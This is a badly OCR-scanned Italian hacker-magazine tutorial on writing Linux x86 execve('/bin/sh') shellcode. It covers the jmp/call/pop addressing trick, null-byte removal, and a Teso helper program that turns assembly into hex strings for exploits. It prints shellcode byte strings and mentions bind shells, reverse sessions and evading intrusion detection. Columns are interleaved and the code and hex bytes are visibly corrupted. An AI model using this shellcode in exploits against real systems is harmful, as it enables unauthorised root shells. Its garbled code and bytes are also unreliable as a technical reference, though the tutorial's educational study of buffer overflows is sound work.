(jump) che utilizzeremo fa "saltare" il codice all'indirizzo specificato. 
Anzi, in realtà in questo caso il parametro fornito sarà un offset, ov- 
vero un valore che rappresenta la distanza in byte dall'indirizzo di 
destinazione. 

La "cali" è diversa; si tratta infatti di una chiamata ad una subrouti- 
ne. Quando viene eseguita una cali, l'indirizzo immediatamente 
successivo alla cali stessa viene salvato sullo stack. 
Per esempio, se la cali si trova a questo ipotetico indirizzo: 



sullo stack troveremo l'indirizzo 0x804cff5. 

Ora tutto dovrebbe essere più chiaro. Mettendo all'inizio della no- 
stra shellcode un jmp alla fine della codice, facendolo puntare alla 



Buffer Overflow: un frequente errore nella gestione 
dei dati da parte di un programma. Se lo spazio a disposi- 
zione per certi dati (buffer) si esaurisce, il programma po- 
trebbe andare incontro ad errori o, come spesso accade, 
eseguire direttamente e senza controlli istruzioni immesse 
maliziosamente da un utente qualsiasi,. 



■ 



dove il primo parametro della funzione (l'indirizzo della stringa 
"/bin/sh" viene posto in edi, e le righe: 



dove il secondo parametro (l'indirizzo di sh) viene postu in 
Oxc(%ebp),%ecx), il terzo parametro (NULL) 
(0xl0(%ebp),%edx). Quindi viene chiamata la execve (cod ; 



cali (che richiamerà l'inizio del codice), provocheremo il salvataggio 
dell'indirizzo successivo alla cali; se noi dopo la cali metteremo la 
nostra stringa, l'indirizzo stesso della stringa si troverà sullo stack e 
potrà essere comodamente recuperato con una semplice istruzione 
"popi". Ovvero: 

jmp finecodice; salta a fine codice 

inizio: ; label di inizio codice 

preleva eip dallo stac 1 

corpo dello shellc 

label di fine codic_ 
^ . ,__ , la cali provoca il salvaiaggio ai eip s 

stack, ovvero l'indirizzo della nostra : 
.stringa "/bin/sh" : la stringa da passare a execve 
il codice parte, salta a "finecodice:", esegue la cali: l'indirizzo della 
stringa viene salvato sullo stack. La cali porta il flusso del program- 
ma a "inizio:" dove l'istruzione popi recupera l'indirizzo della stringa. 



esto è quello cr 
parametri e < 
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de: passare i'tre 



kterioso J 



.nvmv niserire il nostro Cv 
ceremo a priori gli indirizzi dove il codice stesso si verrà a 1 
ne. Visto che noi dobbiamo passare dei parametri alla funzioi 
bbiamo conoscere almeno l'indirizzo dove poter trovare questi 
irametri. Ci serve quindi un espediente per trovare questo 
dirizzo. Semplice: metteremo la stringa alla fine del codice, quin- 
utilizzeremo una jmp e una cali. Per capire bene cosa stiamo per 
re occorre rispolverare un po' di assembler. L'istruzione "imp" 



inciamo ore 
odice in as 


3 a dare 
sembler: 


11. e 
main ( ) { 

ti ( " jmp J 

zio: popi 
1 ,'%esi, OxÉ 
f '$0x0, Oxc 
b $0x0, 0x^ 
1 %esi,%el 
1 %0x8(%e; 


■%ed!f) 
Dx%\n" 
si) , %ecx 


1 %0xc(%e; 


Fi) , %edx 



i stiamo perf! "ir 
zione ] }rWJ 4 "fi 



www.hackerjour 
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INTRODUZIONE ALLO SHELL CODING 



Viene impostata la label "inizio:" che servirà alla cali, quindi dopo la 
popi %esi, esi stesso conterrà l'indirizzo della stringa. 



dobbiamo sistemare i parametri. Copiamo l'indirizzo della stringa 

nel secondo parametro 

"movi %esi,0x8 (%esi) \n" 

mettiamo uno zero nel terzo 

"movi $0x0, Oxc(%esi) \n" 

e mettiamo zero alla fine della stringa, carattere di fine strin 

"movb $0x0,0x7 (%esi) \n" 

quindi passiamo gli indirizzi dei parametri nei registri dove execve si 

aspetta di trovarli... (ebx,ecx,edx) 

"movi %esi, s -' K - \-" 

"leal %0x8l 



si esegue la chiamata a execv 



Ma se dobbiamo utilizzare lo zero, per esempio per azzerare un re- 
gistro? Chi programma in assembler sa che in genere per azzerare 
i registri non si usa mov $0x0, %eax; al suo posto si può utilizzare 
xorl %eax,%eax. L'or-esclusivo (xor) del registro con se stesso da co- 
me risultato zero. Quindi, inseriamo la linea xorl %eax, %eax ed 
effettuiamo le mov necessarie: movb %al,0x7 (%esi) e movi 



Infine cambiamo un opcode. Al posto di 



ax mettia- 



La differenza tra i due opcode è che il primo coinvolge tutto il regi- 
stro eax, mentre il secondo solo la parte bassa di eax, ovvero "al" il 
"registrino" a 8 bit "contenuto" in eax. Mettere il valore "Oxb" (ovvero 
il codice di execve) in "al" prima di chiamare int 80 è il nostro scopo, 
quindi questa soluzione ci andrà benissimo. 

In alternativa a xor, si potrebbe usare l'istruzione sub. Per esempio 
sub eax,eax ottiene l'effetto di azzerare il registro. 
Ora il nostro shellcode avrà questo aspetto: 



movi ^uxD,^eax 


2H 133 f JnfWMè 


* 




e ci trovian 


no root :, 



%1 ì 




xorl %eax, %eax 



sr 



me: cali inizio \n 



blemi non sono ancora finiti. Infatti, se compiliam< 

presentato, troveremo degli zeri all'interno dello shellcode e questo, 



Compiliamolo con gcc shell2.c -o shell2 e lanciamo 
Analizzando il nostro codice con xb/x non trovererrr 




linee evidenziate con "<" non vanno bene e devono esser^ 
alche modo cambiate. (Per brevità, sono state omesse alcune 

iee, in corrispondenza dei segni [...]) 

Bisogna ottimizzare il codice assembler, eliminando gli zeri. 



tutti gli exploit 





L'ultima nostra fatica sarà quella di convertire il codice macchina ì 

stringhe contenenti codice esadecimale da inserire nell'exploit stesse 

Le vie sono due: a manina, oppure usando un programma 

Se siamo masochisti useremo la via dei folli, ovvero la Via della Me 

fcp Sinistra, la prima. 

Compiliamo il nostro codicillo, entriamo in gdb, scandagliamo il ce 



■>, ovvero: 



gcc sneiiz 

Q v 
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8< 0UTP.C 

#INCLUDE <STDIO.H> 



produrre il listato assembler e quindi compiliamo il prodotto con 
outp.c dei teso: 



TYPO/TESO (TYPO@INFERNO.TUSCU- 



LUM.EDU) 
$ CAT LALA.S 
.GLOBL CBEGIN 
.GLOBL CEND 



XORL %EAX, 



$ GCC -WALL LALA.S OUTP.C - 

$ ./LALA 

UNSIGNED CHAR SHELLCODE[] = 

"\X31\XC0\X31\XDB\X31\XC9\XB3\X0F\XB1\X0F\XB0\X47\XCD\X8 

0\XEB\X1E\X5B" 

"\X31\XC0\X88\X43\X07\X89\X5B\X08\X89\X43\X0C\X8D\X4B\X0 

8\X8D\X53\X0C" 

"\XB0\X0B\XCX)\X80\X89\XC3\X31\XC0\XB0\X01\XCD\X80\XE8\XD 

D\XFF\XFF\XFF" 

"\X2F\X74\X6D\X70\X2F\X74\X73\X74\X65\X73\X6F\X63\X72\X6 

5\X77\X21\X21"; 



EXTERN VOID CBEGIN ( ) ; 
EXTERN VOID CEND () ; 
INT MAINO { 

CHAR *BUF = (CHAR *) CBEG— ,, 
INT I = 0, X = 0; 
PRINTF( "UNSIGNED CHAR SHELLCODE[] = \N\""); 
FOR (; (*BUF) && (BUF < (CHAR *) CEND); BUF++) { 
IF (I++ == 17) 1 = 1; 

IF (I == 1 && X != 0) PRINTF("\"\N\""); 
X = 1; 
PRINTF("\\X%02X", (UNSIGNED CHAR) *BUF) ; 

PRINTF("\";\N");P 

PRINTF("INT MAINO {VOID (*F)();F = (VOID *) 
SHELLCODE; PRINTF (\"%%D\\N\", 
STRLEN(SHELLCODE) ) ;F ();}") ; 

RETURN (0); 



eseguendo il programma così ottenuto (ovvero "codicillo") si otterrà 
la shellcode in formato stringa/hex e una funzione per testarla. Così 
per interderci: 



\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\xc3\xb0\xl7\xcd\ 

x80\x31\xc0\x£ 
\x46\x0c\x88\x46\x07\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\ 



Attenzione: il codice dei Teso prevede la presenza di due label "cbe- 
gin:" e "cend:" prima della shellcode e subito dopo; inoltre otterrete 
un errore se utilizzerete il nome "main" per la funzione della shellco- 
de: sostituitelo con "cmain" e tutto dovrebbe funzionare. 



Nessuno si illuda. Una volta acquisiti i concetti qui espressi non si di- 
venta automaticamente "hacker". Questo rappresenta il know-how di 
base per chi vuole intraprendere la strada della nobile arte hackere- 
sca. Questi sono argomenti già conosciuti, triti e ritriti, quasi banali 
>unto di vista dell'hacking. Lo shellcode che abbiamo visto è mol- 
emplice (ma efficace). In realtà spesso ciò non basta. Po- 
tremmo aver bisogno di bindare la shell sul tcp, droppare la roots- 
in /tmp, aprire una sessione telnet inversa... Il limite è dato 
...la fantasia e dall'abilità. Inoltre bisogna considerare la pre- 
senza di IDS. Esistono tecniche che permettono di "beffarli". Su un 
vecchio numero di phrack è stato presentato un compilatore di shell- 
e che permette di trasformare il codice prodotto utilizzando solo 
tteri stampabibli. Questo articolo ha cercato di spiegare alcuni 
cetti che forse erano ancora oscuri a molti, e ha voluto far intra- 
vedere ad altri la meraviglia dell'arcana programmazione in assem- 
bler. Forse qualcuno abbandonerà i trojan o gli scriptz e 
cercherà finalmente di capire che cosa sta facendo... El 

Tritemius - OQ Staff 



Prendiamo Oxeb e lo copiamo, prendiamo 0x18 e lo copiamo... 
In alternativa possiamo usare la Via della Mano Destra, la via con- 
templativa: facciamo un programmino. Anzi, quei santi ragazzi dei 
Teso hanno già provveduto. Lo scriptino nel riquadro a sinistra, 
"Script di shellcode" fa al caso nostro. 
L'uso è semplicissimo. Compiliamo la nostra shellcode con -S per 
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